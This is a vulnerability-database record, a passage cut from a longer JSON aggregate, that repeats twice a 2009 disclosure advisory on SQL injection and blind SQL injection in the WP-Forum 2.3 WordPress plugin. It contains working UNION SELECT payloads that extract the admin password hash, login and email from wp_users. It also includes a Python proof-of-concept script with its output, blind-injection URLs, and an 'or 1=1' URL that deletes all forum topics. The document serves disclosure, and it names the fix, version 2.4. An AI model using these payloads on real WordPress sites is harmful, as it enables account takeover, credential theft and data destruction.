\n1510 } \n \nthe \"id\" parameter is vulnerable in other parts of the source code.. \n \nAlso, is possible to delete all records in table $this->t_posts and \n$this->t_threads because $_GET['topic'] is not properly sanitized, \ninjecting something like 1 or 1=1 \n \n1479 function remove_topic(){ \n1480 global $user_level, $user_ID, $wpdb; \n1481 $topic = $_GET['topic']; \n1482 if($this->is_moderator($user_ID, $this->current_forum)){ \n1483 $wpdb->query(\"DELETE FROM $this->t_posts WHERE \nparent_id = $topic\"); \n1484 $wpdb->query(\"DELETE FROM $this->t_threads WHERE \nid = $topic\"); \n1485 } \n1486 else \n1487 wp_die(__(\"Cheating, are we?\", \"wpforum\")); \n1488 \n1489 } \n \nIV. PROOF OF CONCEPT \n------------------------- \nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search \nreplacing 'page_id=3' parameter with the number of the WP-Forum page \nin each case \n \nIs possible to obtain any data of the database. Here is a proof of \nconcept to obtain user_pass, user_login and user_email of the user \nwith id=1 of wp_users table (normally admin). \n \nWe have to fill the search_max parameter with the value: \n \n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1 \nand subdate(curdate(), interval 9999 \n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1 \nand subdate(curdate(), interval 9999 \n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1 \nand subdate(curdate(), interval 9999 \n \nI wrote a PoC, to get automatically the password hash of the WordPress \nadmin account: \n \nuser () linuz:~$ cat wpforum2.3-poc.py \n#!/usr/bin/python \n \n# WP-Forum <= 2.3 SQL Injection PoC \n# Juan Galiana Lara \n# Internet Security Auditors \n \nimport urllib \nimport urllib2 \nimport re \n \nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search' \nvalues = {'search_words' : 'any', \n'search_submit' : 'Search', \n'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1 \nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' } \n \ndata = urllib.urlencode(values) \nreq = urllib2.Request(url, data) \nresponse = urllib2.urlopen(req) \noutput = response.read() \no = re.search('viewtopic.+>([$].+)<',output) \nif o: \nprint o.group(1) \n \nuser () linuz:~$ python wpforum2.3-poc.py \n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/ \nuser () linuz:~$ \n \nThat's it! \n \nFor the blind sql injection, here are some examples: \n \nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0 \nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0 \n \nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0 \nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1 \n \nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0 \nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1 \n \nIs possible to delete all topics, injecting sql code in \"topic\" parameter: \n \nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1 \n \nV. BUSINESS IMPACT \n------------------------- \nUnauthenticated users can obtain or delete any data of the database. \nThis flaw could result in get access to WordPress accounts including \nthe administrator one. \n \nVI. SYSTEMS AFFECTED \n------------------------- \nWP-Forum <= 2.3 are vulnerable. \n \nVII. SOLUTION \n------------------------- \nUpdate to version 2.4. \n \nVIII. REFERENCES \n------------------------- \nhttp://www.fahlstad.se/wp-plugins/wp-forum/ \nhttp://www.wordpress.org/ \nhttp://www.isecauditors.com/ \n \nIX. CREDITS \n------------------------- \nThis vulnerability has been discovered by \nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com). \n \nX. REVISION HISTORY \n------------------------- \nSeptember 28, 2009: Initial release. \nOctober 13, 2009: Review. \nOctober 19, 2009: Added CVE id. \nDecember 15, 2009: Last revision. \n \nXI. DISCLOSURE TIMELINE \n------------------------- \nSeptember 28, 2009: Vulnerability discovered \nby Internet Security Auditors. \nOctober 13, 2009: Sent to developers. No response. \nDecember 13, 2009: Contact again. Response about its correction. \nDecember 14, 2009: New version published. \nDecember 15, 2009: Advisory released to lists. \n \nXII. LEGAL NOTICES \n------------------------- \nThe information contained within this advisory is supplied \"as-is\" \nwith no warranties or guarantees of fitness of use or otherwise. \nInternet Security Auditors accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83915/wpforum23-sql.txt"}], "exploitdb": [{"lastseen": "2022-08-16T09:22:23", "description": "", "cvss3": {}, "published": "2009-12-16T00:00:00", "type": "exploitdb", "title": "WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2009-3703", "CVE-2009-3703"], "modified": "2009-12-16T00:00:00", "id": "EDB-ID:10488", "href": "https://www.exploit-db.com/exploits/10488", "sourceData": "=============================================\r\nINTERNET SECURITY AUDITORS ALERT 2009-010\r\n- Original release date: September 28th, 2009\r\n- Last revised: December 15th, 2009\r\n- Discovered by: Juan Galiana Lara\r\n- CVE ID: CVE-2009-3703\r\n- Severity: 8.5/10 (CVSS Base Score)\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nWP-Forum is a discussion forum plugin for WordPress. It works with\r\nWordPress 2+ version and PHP >= 5.0\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nWP-Forum fails to sanitized user supplied input and is vulnerable to\r\nSQL Injection and Blind SQL Injection. An attacker can obtain any data\r\nof the database including user logins and password's of the WordPress\r\ninstallation, allowing him to obtain access to the application and\r\ngain administration privileges.\r\n\r\nFor the SQL Injection vulnerability, is possible to concatenate other\r\nsql requests via \"union select\" sentence. The parameters \"search_max\"\r\nand \"forum\" are affected by this flaw.\r\n\r\nSnippet of vulnerable code:\r\n\r\nIn wpf.class file:\r\n\r\n1836 $option_max_days = $_POST['search_max']; // <- this\r\nline is not being sanitized\r\n1837 $option_forums = $_POST['forum'];\r\n1838 if(!$option_max_days)\r\n1839 $option_max_days = 9999;\r\n1840 $op .= \" AND $this->t_posts.`date` > SUBDATE(CURDATE(),\r\nINTERVAL $option_max_days DAY) \";\r\n1841\r\n...\r\n1850 foreach((array)$option_forums as $f)\r\n1851 $a .= $f.\",\"; // <- <- this lines is not being\r\nsanitized\r\n1852\r\n1853 $a = substr($a, 0, strlen($a)-1 );\r\n1854 if(!$a)\r\n1855 $w = \"\";\r\n1856 else\r\n1857 $w = \"IN($a)\";\r\n1858\r\n1859 $sql = \"SELECT $this->t_threads.parent_id as pt,\r\n$this->t_posts.id, text, $this->t_posts.subject,\r\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\r\n('$search_string') AS score\r\n1860 FROM $this->t_posts inner join $this->t_threads on\r\n$this->t_posts.parent_id = $this->t_threads.id\r\n1861 WHERE $this->t_threads.parent_id $w\r\n1862 AND MATCH (text) AGAINST ('$search_string') $op\";\r\n\r\nIn the case of the Blind SQL Injection, the vulnerable code is...\r\n\r\nIn wpf-post.php file:\r\n\r\n 57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n 58 $thread = $this->check_parms($_GET['t']);\r\n 59\r\n 60 $out .= $this->header();\r\n 61\r\n 62 $post = $wpdb->get_row(\"SELECT * FROM $wpforum->t_posts WHERE\r\nid = $id\"); // <- id is used without clean up\r\n\r\nother example:\r\n\r\n1490 function remove_post(){\r\n1491 global $user_level, $user_ID, $wpdb;\r\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n1493 $author = $wpdb->get_var(\"SELECT author_id from\r\n$this->t_posts where id = $id\"); // id is used without clean up\r\n...\r\n1503 if($del == \"ok\"){\r\n1504 $wpdb->query(\"DELETE FROM $this->t_posts WHERE id\r\n= $id\"); <- // id is used without clean up\r\n1505 $this->o .= \"<div class='updated'>\".__(\"Post\r\ndeleted\", \"wpforum\").\"</div>\";\r\n1506 }\r\n1507 else\r\n1508 wp_die(__(\"Cheating, are we?\", \"wpforum\"));\r\n1509\r\n1510 }\r\n\r\nthe \"id\" parameter is vulnerable in other parts of the source code..\r\n\r\nAlso, is possible to delete all records in table $this->t_posts and\r\n$this->t_threads because $_GET['topic'] is not properly sanitized,\r\ninjecting something like 1 or 1=1\r\n\r\n1479 function remove_topic(){\r\n1480 global $user_level, $user_ID, $wpdb;\r\n1481 $topic = $_GET['topic'];\r\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\r\n1483 $wpdb->query(\"DELETE FROM $this->t_posts WHERE\r\nparent_id = $topic\");\r\n1484 $wpdb->query(\"DELETE FROM $this->t_threads WHERE\r\nid = $topic\");\r\n1485 }\r\n1486 else\r\n1487 wp_die(__(\"Cheating, are we?\", \"wpforum\"));\r\n1488\r\n1489 }\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search\r\nreplacing 'page_id=3' parameter with the number of the WP-Forum page\r\nin each case\r\n\r\nIs possible to obtain any data of the database. Here is a proof of\r\nconcept to obtain user_pass, user_login and user_email of the user\r\nwith id=1 of wp_users table (normally admin).\r\n\r\nWe have to fill the search_max parameter with the value:\r\n\r\n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n\r\n## Exploit-DB Note: Try using \"999 DAY)\" if 9999 doesn't work in your environment.\r\n\r\nI wrote a PoC, to get automatically the password hash of the WordPress\r\nadmin account:\r\n\r\nuser () linuz:~$ cat wpforum2.3-poc.py\r\n#!/usr/bin/python\r\n\r\n# WP-Forum <= 2.3 SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Internet Security Auditors\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\n\r\nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search'\r\nvalues = {'search_words' : 'any',\r\n 'search_submit' : 'Search',\r\n 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1\r\nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }\r\n\r\ndata = urllib.urlencode(values)\r\nreq = urllib2.Request(url, data)\r\nresponse = urllib2.urlopen(req)\r\noutput = response.read()\r\no = re.search('viewtopic.+>([$].+)<',output)\r\nif o:\r\n print o.group(1)\r\n\r\nuser () linuz:~$ python wpforum2.3-poc.py\r\n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/\r\nuser () linuz:~$\r\n\r\nThat's it!\r\n\r\nFor the blind sql injection, here are some examples:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1\r\n\r\nIs possible to delete all topics, injecting sql code in \"topic\" parameter:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nUnauthenticated users can obtain or delete any data of the database.\r\nThis flaw could result in get access to WordPress accounts including\r\nthe administrator one.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nWP-Forum <= 2.3 are vulnerable.\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nUpdate to version 2.4.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.fahlstad.se/wp-plugins/wp-forum/\r\nhttp://www.wordpress.org/\r\nhttp://www.isecauditors.com/\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by\r\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nSeptember 28, 2009: Initial release.\r\nOctober 13, 2009: Review.\r\nOctober 19, 2009: Added CVE id.\r\nDecember 15, 2009: Last revision.\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nSeptember 28, 2009: Vulnerability discovered\r\n by Internet Security Auditors.\r\nOctober 13, 2009: Sent to developers. No response.\r\nDecember 13, 2009: Contact again. Response about its correction.\r\nDecember 14, 2009: New version published.\r\nDecember 15, 2009: Advisory released to lists.\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied \"as-is\"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse of this information.", "sourceHref": "https://www.exploit-db.com/download/10488", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
WordPress Plugin WP-Forum 2.3 - SQL Injection Blind SQL Injection
